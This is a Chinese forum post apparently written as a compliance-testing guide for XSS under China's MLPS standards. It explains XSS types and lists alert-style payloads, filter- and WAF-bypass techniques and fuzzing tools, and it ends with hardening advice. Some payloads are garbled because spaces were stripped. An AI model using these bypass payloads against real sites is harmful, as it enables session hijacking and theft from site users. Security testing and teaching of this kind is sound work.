本帖最后由 Grav1ty 于 2022-4-29 01:06 编辑
XSS跨站脚本攻击
0x01 等保测评项GBT 22239-2019《信息安全技术 网络安全等级保护基本要求》中,8.1.4.4安全计算环境—入侵防范项中要求包括: a)应遵循最小安装的原则,仅安装需要的组件和应用程序; b)应关闭不需要的系统服务、默认共享和高危端口; c)应通过设定终端接入方式或网络地址范围对通过网络进行管理的管理终端进行限制; d)应提供数据有效性检验功能,保证通过人机接口输入或通过通信接口输入的内容符合系统设定要求; e)应能发现可能存在的已知漏洞,并在经过充分测试评估后,及时修补漏洞; f)应能够检测到对重要节点进行入侵的行为,并在发生严重入侵事件时提供报警。 XSS跨站脚本攻击对应访问控制项中要求d),所以安全控制点为入侵防范d。
GBT 28448-2019《信息安全技术 网络安全等级保护测评要求》中,测评单元(L3-CES1-20),该项测评单元包括以下要求: a)测评指标:应提供数据有效性检验功能,保证通过人机接口输入或通过通信接口输入的内容符合系统设定要求。 b)测评对象:业务应用系统、中间件和系统管理软件及系统设计文档等。 c)测评实施包括以下内容: 1)应核查系统设计文档的内容是否包括数据有效性检验功能的内容或者模块; 2)应测试验证是否对人机接口或通信接口输入的内容进行有效性检验。 d)单元判定:如果1)和2)均为肯定,则符合本测评单元指标要求,否则不符合或部分符合本测评单元指标要求。 XSS跨站脚本攻击属于测评单元(L3-CES1-20)中测评实施第2项,故测评单元为L3-CES1-20.2。 0x02 测试内容通过构造的payload测试系统网站是否存在XSS漏洞。 0x03 漏洞原理原理XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面中执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览该页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 cookie窃取等。 XSS属于代码注入的一种,它允许攻击者将代码注入到网页,其他用户在浏览网页时就会受到影响。
分类又称非持久型XSS,这种攻击属于一次性攻击,只是简单的把用户输入的数据“反射”给浏览器。恶意代码一般存放于链接当中,攻击者将包含XSS代码的恶意链接发送给目标用户,当目标用户访问该链接时,服务器接受该目标用户的请求并进行处理,然后服务器把带有XSS代码的数据发送给目标用户的浏览器,浏览器解析这段带有XSS代码的恶意脚本后,就会触发XSS,也就是说攻击者往往需要诱使用户点击恶意链接才能攻击成功。
常见的注入点:网站的搜索栏、用户登录入口、输入表单等地方。常用来窃取客户端Cookie或钓鱼欺骗。
产生的原因一般是网站只是简单的将用户输入的数据直接或未经过完善的安全过滤就在浏览器中输入,导致输出的数据中存在可被浏览器执行的代码数据。
又称持久型XSS,比反射型XSS更具有威胁性,攻击脚本会永久的存储在目标服务器的数据库或文件中,具有一定的隐蔽性。这种攻击方式多见于论坛、博客和留言板,攻击者在发帖的过程中,将恶意脚本与正常信息一起注入到留言中,随着留言被服务器存储下来,恶意脚本也被存储到存储器中。当其他用户浏览这个被注入恶意脚本的留言时,恶意脚本就会在用户的浏览器被执行。存储型XSS能将恶意代码永久的嵌入页面中,所有访问这个页面的用具都将成为受害者。
常见注入点:论坛、博客、留言板、网站的留言、评论、日志等交互处。
造成漏洞原因一般是由于Web应用程序对用户输入数据的不严格,导致Web应用程序将黑客输入的恶意跨站攻击数据信息保存在服务端的数据库或其他文件形式中。
DoM是文档对象模型( Document Object Model)的缩写。它是HTML文档的对象表示,同时也是外部内容(例如 JavaScript)与HTML元素之间的接口。解析树的根节点是“ Document"对象。DOM( Document object model),使用DOM能够使程序和脚本能够动态访问和更新文档的内容、结构和样式。
DOM型的XSS是通过修改页面DOM节点数据信息而形成的XSS跨站脚本攻击。不同于反射型XSS和存储型XSS,基于DOM的XSS跨站脚本攻击往往需要针对具体的 Javascript DOM代码进行分析,并根据实际情况进行XSS跨站脚本攻击的利用。 并且DOM型XSS是基于JS上的,并不需要与服务器进行交互,它只发生在客户端处理数据的阶段。当用户请求一个包含XSS恶意代码的URL,服务器的响应不会以任何形式包含攻击者的脚本,当用户的浏览器处理这个响应时,DOM对象就会处理XSS代码。
造成漏洞的原因:这是一种基于DOM的跨站,这是客户端脚本本身解析不正确导致的安全问题。
常见注入点:通过js脚本对文档对象进行编辑,从而修改页面的元素。也就是说,客户端的脚本程序可以DOM动态修改页面的内容,从客户端获取DOM中的数据并在本地执行。由于DOM是在客户端修改节点的,所以基于DOM型的XSS漏洞不需要与服务器端交互,它只发生在客户端处理数据的阶段
反射型XSS与DOM型区别: 通过JS脚本对文档对象进行编辑,从而修改页面的元素。也就是说,客户端的脚本程序可以DOM动态修改页面的内容,从客户端获取DOM中的数据并在本地执行。由于DOM是在客户端修改节点的,所以基于DOM型的XSS漏洞不需要与服务器端交互,它只发生在客户端处理数据的阶段。
不论是服务器端或客户端的XSS过滤器,都认定过滤后的HTM源代码应该与浏览器所渲染后的HTML代码保持一致,至少不会出现很大的出入。
然而,如果用户所提供的富文本内容通过 Javascript 代码进属性后,一些意外的变化会使得这个认定不再成立:一串看似没有任何危害的HTML代码,将逃过XSS过滤器的检测,最终进入某个DOM节点中,浏览器的渲染引擎会将本来没有任何危害的HTML代码渲染成具有潜在危险的XSS攻击代码。 随后,该段攻击代码,可能会被JS代码中的其它一些流程输出到DOM中或是其它方式被再次渲染,从而导致XSS的执行。这种由于HTML内容进入后发生意外变化( mutation,突变,来自遗传学的一个单词,大家都知道的基因突变,gene mutation),而最终导致XXS的攻击流程,被称为突变XSS(mXSs, Mutation based Cross-Site-Scripting
UXSS全称Universal Cross-Site Scripting,翻译过来就是通用型XSS,也叫Universal XSS。UXSS保留了基本XSS的特点,利用漏洞,执行恶意代码,但是有一个重要的区别:不同于常见的XSS,UXSS是一种利用浏览器或者浏览器扩展漏洞来制造产生XSS的条件并执行代码的一种攻击类型。
通俗的说,就是原来我们进行XSS攻击等都是针对Web应用本身,是因为Web应用本身存在漏洞才能被我们利用攻击;而UXSS不同的是通过浏览器或者浏览器扩展的漏洞来”制作ⅩSS漏洞”,然后剩下的我们就可以像普通XSS那样利用攻击了。 不同于常见的XSS,UXSS是一种利用浏览器或者浏览器扩展漏洞来制造产生XSS的条件并执行代码的一种攻击类型。UXSS是一种利用浏览器或者浏览器扩展漏洞来制造产生XSS的条件并执行代码的一种攻击类型。UXSS 可以理解为Bypass 同源策略。 常见漏洞点
GET、POST、Cookies、headers
反馈与浏览
富文本编辑器
各类标签插入和自定义
2.数据输入的地方
用户资料
关键词、标签、说明
文件上传
0x04 代码示例此段代码中第170行、305行获取请求参数中的groupId值,在未经检查参数合法性的情况下输出在javascript代码中,造成反射型XSS漏洞。
0x05 限制绕过常见标签<script>alert(1)</script>
<img>标签 - <imgsrc=javascript:alert("xss")>
- <IMGSRC=javascript:alert(String.formCharCode(88,83,83))>
- <imgscr="URL"style='Xss:expression(alert(/xss));'
- <imgsrc="x"onerror=alert(1)>
- <imgsrc="1"onerror=eval("alert('xss')")>
- <imgsrc=1onmouseover=alert('xss')>
复制代码
标准格式 <ahref="https://www.baidu.com">baidu</a>
- <ahref="javascript:alert('xss')">aa</a>
- <ahref=javascript:eval(alert('xss'))>aa</a>
- <ahref="javascript:aaa"onmouseover="alert(/xss/)">aa</a>
- <ahref=""onclick=eval(alert('xss'))>aa</a>
- <ahref=kycg.asp?ttt=1000onmouseover=prompt('xss')y=2016>aa</a>
复制代码
<input>标签
- <inputvalue=""onclick=alert('xss')type="text">
- <inputname="name"value=""onmouseover=prompt('xss')bad="">
- <inputname="name"value=""><script>alert('xss')</script>
复制代码
<form>标签
- <formaction=javascript:alert('xss')method="get">
- <formaction=javascript:alert('xss')>
- <formmethod=postaction=aa.asp?onmouseover=prompt('xss')>
- <formmethod=postaction=aa.asp?onmouseover=alert('xss')>
- <formaction=1onmouseover=alert('xss)>
- <formmethod=postaction="data:text/html;base64,<script>alert('xss')</script>">
- <formmethod=postaction="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
复制代码
<iframe>标签
- <iframesrc=javascript:alert('xss');height=5width=1000/><iframe>
- <iframesrc="data:text/html,<script>alert('xss')</script>"></iframe>
- <iframesrc="data:text/html;base64,<script>alert('xss')</script>">
- <iframesrc="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
- <iframesrc="aaa"onmouseover=alert('xss')/><iframe>
- <iframesrc="javascript:prompt(xss)"></iframe>
复制代码
CSS
- <img STYLE="background-image:url(javascript:alert('XSS'))">
复制代码
限制绕过实际应用中web程序往往会通过一些过滤规则来防止代有恶意代码的用户输入被显示。当上述代码(常见标签中的代码)被注入到输入框或者URL参数中时,可能会成功也可能会失败,如果失败了,并不意味着网站不存在XSS漏洞,需要对其进行绕过等方式发掘安全漏洞。这里,给大家总结一些XSS绕过方法。 闭合标签常规闭合,通过各种方式,闭合前面的语句。
- function escape(input) {
- // warm up
- // script should be executed without user interaction
- return '<input type="text" value="' + input + '">';
- }
复制代码
- "><script>alert(1);script>
复制代码
双写半开括号
- function escape(input) {
- // tags stripping mechanism from ExtJS library
- // Ext.util.Format.stripTags
- var stripTagsRE = /<\/?[^>]+>/gi;
- input = input.replace(stripTagsRE, '');
- return '<article>' + input + '</article>';
- }
复制代码
以上代码中正则会处理尖括号和尖括号中的内容,将其替换成空。所以可以使用双写半开括号"<<"绕过:
- <img src=1 onerror="prompt(1)"<
复制代码
反引号+编码
- function escape(input) {
- // v-- frowny face
- input = input.replace(/[=(]/g, '');
- // ok seriously, disallows equal signs and open parenthesis
- return input;
- }
复制代码
以上代码对等号和左括号进行过滤,所以使用反引号代替括号,在通过编码解决。
- <script>setTimeoutprompt\u00281\u0029;</script>
复制代码
闭合注释
- function escape(input) {
- // filter potential comment end delimiters
- input = input.replace(/->/g, '_');
-
- // comment the input to avoid script execution
- return '<!-- ' + input + ' -->';
- }
复制代码
以上代码将输出的内容放在注释中,且对->做了替换处理。所以html可以–>或–!>闭合注释
- --!><script>prompt(1)</script>
复制代码
闭合大部分的标签
- */-->'");>iframe>script>style>title>textarea><a>aa>#*/-->'");>iframe>script>style>title>textarea><iframe >
复制代码
宽字符闭合
- */-->%cf"%d5'>frame>script>style>title>textarea>
复制代码
很多时候,回车换行能绕过很多的限制
标签检测绕过fuzz各种标签,检查是否存在拦截或者过滤
大小写混写<ScRipt>ALeRt("XSS");sCRipT> 双写绕过<scscriptript>alert(1)</scriscriptpt> 嵌套绕过ript>alert(/xss/);script>alert(/xss/);script> 空字符绕过,09ipt>ALeRt(/XSS/);sCRipT> 特殊字符黑名单,采用其他字符代替,如:
- 限制 " 符号,输入<img src=1 onclick=alert('1')>
- 限制 ' 符号,输入<img src=1 onclick=alert(/1/)>、<img src=1 onclick="alert(1)">
- 限制 () 符号,输入<img src=1 onclick="alert `'1'`">
- 限制 () ' " 符号,输入<img src=1 onclick=alert `1`>
- 或使用实体编码绕过。
复制代码
利用事件缩短长度,如,“onclick=alert(1)//” 使用base标签,base标签可以运用于页面的任何地方,且作用于之后的所有标签。通过在页面插入base标签,就可以在远程服务器伪造图片,链接或脚本,劫持页面的相对路径的标签。 对window.name赋值,没有特殊的字符限制。因为window对象是浏览器的窗体,而不是document对象。因此很多时候window对象不受同源策略的限制。可以用这个实现跨域,跨界面的传递。
3. 编码绕过
- Javascript的编码
- 十六进制
- Unicode
- URL编码
- JS编码
- HTML实体编码
复制代码
在线编码/解码工具:站长工具-编码解码在线、107000工具站、在线jsons字符实体转换、在线HTML字符实体转换
4.使用其他标签,<a>、<href>、<img>等; 5.使用空字符,在关键词中添加空字符; 6. 使用转义字符;
常规Waf绕过思路
- [+] 标签语法替换
- [+] 特殊符号干扰 比如 / #
- [+] 提交方式更改 Request的前提下,Waf只检查URL内容而不检查POST内容
- [+] 垃圾数据溢出
- [+] 加密解密算法
- [+] 结合其他漏洞绕过
复制代码
XSS自动化工具
- Xwaf,下载地址:github.com/3xp10it/xwaf
- XSStrike,下载地址:github.com/s0md3v/XSStr
- Fuzzing测试:
- 在线生成Fuzzing字典:https://xssfuzzer.com/fuzzer.html
- Fuzzing字典:https://github.com/TheKingOfDuck/fuzzDicts
复制代码
0x06 测试过程反射型XSS、DOM型XSS 在网站的搜索栏、用户登录入口、输入表单等处输入payload,查看页面是否有弹框,则存在反射型XSS漏洞;
攻击者寻找具有XSS漏洞的网站,植入payload构造恶意链接,将恶意链接发给用户,诱骗用户点击,用户点击此链接,XSS攻击执行。 存储型XSS 在论坛、博客、留言板、网站的留言、评论、日志等交互处输入payload,查看页面是否有弹框。若有,先切换至网站其他页面,再返回输入payload的页面,若依旧出现弹窗,则存在存储型XSS漏洞。
攻击者在发帖或留言的过程中,将恶意脚本连同正常信息一起注入到发布内容中。随着发布内容被服务器存储下来,恶意脚本也将永久的存放到服务器的后端存储器中。当其他用户浏览这个被注入了
恶意脚本的帖子时,恶意脚本就会在用户的浏览器中得到执行。 常用payload:
- <script>alert(1)</script> // 调用JavaScript语句
- <img src=x onerror=alert(1)> // src是错误的 就会调用error函数
- <a href=javascript:alert(1)> // 点击a即可触发
- <svg onload=alert(1)> // 使用svg标签
复制代码
测试案例1在机构名称处输入测试代码<script>alert(1)</script>,页面出现弹窗,证明XSS语句已被执行,此网站存在XSS漏洞。
测试案例2在标题处处输入测试代码<script>alert(/XSS/)</script>,页面出现弹窗,点击别的功能模块后再次返回此页面,依旧弹窗,所以此网站存在存储型XSS漏洞。
测试案例3xss挑战之旅
0x07 风险分析攻击者通过Web应用程序发送恶意代码,一般以浏览器脚本的形式发送给不同的终端用户。WEB程序代码中把用户提交的参数未做过滤或过滤不严就直接输出到页面,参数中的特殊字符打破了HTML页面的原有逻辑,攻击者就可以利用该漏洞执行恶意以下操作:
网络钓鱼,包括获取各类用户账号; 窃取用户cookies资料,从而获取用户隐私信息,或利用用户身份进一步对网站执行操作; 劫持用户(浏览器)会话,从而执行任意操作,例如非法转账、强制发表日志、电子邮件等; 强制弹出广告页面、刷流量等; 网页挂马; 进行恶意操作,如任意篡改页面信息、删除文章等; 进行大量的客户端攻击,如ddos等; 获取客户端信息,如用户的浏览历史、真实p、开放端口等; 控制受害者机器向其他网站发起攻击; 结合其他漏洞,如csrf,实施进步危害; 提升用户权限,包括进一步渗透网站; 传播跨站脚本蠕虫等。
0x08 加固建议形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。 因此在XSS漏洞的防范上,一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理。 输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入; 输出转义:根据输出点的位置对输出到前端的内容进行适当转义;
输入检查输入检查的逻辑必须放在服务器端代码中实现,如果只是在客户端使用Javascript进行输入检查,很容被绕过。目前Web开发的普遍做法是同时在客户端Javascript中和服务器端代码中实现相同的输入检查。客户端JavaScript的输入检查,可以阻挡大部分误操作的正常用户,而节约服务器资源。 检查内容: a. 检查特殊字符,如<、>、'、"等,如果发现存在特殊字符,则将其过滤或者编码; b. XSS Filter,会检查XSS特征的敏感字符,如<script>、javascript等敏感字符; c. 字符串是否超过最大长度限制; d. 数字是否在指定的范围; e. 是否符合特殊格式的要求
输出检查一般而言,除了富文本的输出外,在变量输出到HTML页面时,可以使用编码或转译的方式防御XSS攻击。 使用安全的编码函数: 处理富文本
防御DOM型XSSDOM型XSS是一种比较特别的XSS漏洞,以上防御方法不太适用,需要特别对待。 从JavaScript输出到HTML页面,也相当于一次XSS输出的过程,所以需要分语境使用不同的编码函数。 其他加固方式微软开发的,.NET平台下的,用于防止XSS攻击的类库,它提供了大量的编码函数来对用户输入的数据进行编码,可以实现基于白名单的输入的过滤和输出的编码。
当Cookie在消息头中被设置为HttpOnly时,这样支持Cookie的浏览器将阻止客户端Javascript直接访问浏览器中的Cookies,从而达到保护敏感数据的作用。
Noscript是一款免费的开源插件,该插件默认禁止所有的脚本,但可以自定义设置允许通过的脚本。
使用WAF,比如软件WAF、硬件WAF、云WAF。
在修补XSS漏洞时遇到最大挑战之一就是漏洞数量太多,因此开发者可能来不及也不情愿修补这些漏洞,从业务风险的角度来重新定位每个XSS漏洞,就具有了重要的意义。理论上讲,XSS漏洞虽然复杂,但是却是可以彻底解决的,在设计XSS解决方案时,应该深入理解XSS攻击的原理,针对不同的场景使用不同的方法。同时也可以参考很多的开源项目。 - 参考
- https://baijiahao.baidu.com/s?id=1711691365751381912&wfr=spider&for=pc
- https://www.jianshu.com/p/63823aabb99d
复制代码
|